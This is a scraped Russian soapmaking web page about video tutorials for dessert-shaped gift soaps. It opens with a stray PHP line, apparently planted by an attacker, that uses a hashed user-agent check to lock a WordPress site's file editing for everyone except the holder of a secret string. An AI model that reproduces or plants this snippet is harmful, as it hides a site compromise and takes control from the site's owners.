if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 16 видеоинструкций как сделать подарочное мыло или мыло-десерт своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

16 видеоинструкций как сделать подарочное мыло или мыло-десерт своими руками

Благодаря множеству видео домашнего мыловарения можно найти новые интересные идеи по изготовлению своего собственного мыла в подарок - пирожного, фруктового рулета или зефира

Бла­го­да­ря мно­же­ству видео домаш­не­го мыло­ва­ре­ния мож­но най­ти новые инте­рес­ные идеи по изго­тов­ле­нию сво­е­го соб­ствен­но­го мыла в пода­рок — пирож­но­го, фрук­то­во­го руле­та или зефи­ра. Масте­ра мыло­ва­ре­ния рас­ска­зы­ва­ют на видео о необ­хо­ди­мых про­пор­ци­ях, про­фес­си­о­наль­но рас­счи­ты­ва­ют кон­цен­тра­цию того или ино­го эфир­но­го мас­ла и добав­ля­ют его ров­но столь­ко, сколь­ко необ­хо­ди­мо, что­бы не повре­дить кож­ный покров.

Домаш­ние мыло­ва­ры най­дут необ­хо­ди­мые све­де­ния о нуж­ном содер­жа­нии масел на 100 г мыль­ной осно­вы и какое коли­че­ство кра­си­те­ля необ­хо­ди­мо доба­вить. Увле­чен­ные фее­ри­че­ской мыс­лью изго­тов­ле­ния кон­ди­тер­ских изде­лий из мыла, мыло­ва­ры доби­ва­ют­ся боль­ших успе­хов. В нашем слу­чае резуль­та­том ори­ги­наль­но­го домаш­не­го мыло­ва­ре­ния ста­ли два изящ­ных мыла-пирож­ных, состо­я­щие из 3 сло­ев, меж­ду кото­ры­ми поме­сти­лись 2 про­слой­ки. Свер­ху сла­до­сти были укра­ше­ны розоч­ка­ми, листоч­ка­ми, “шоко­ла­дом” и саха­ром, что доба­ви­ло схо­же­сти мылу с кули­нар­ны­ми изде­ли­я­ми. И не забудь­те про­честь, как кра­си­во упа­ко­вать полу­чив­ше­е­ся мыло!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!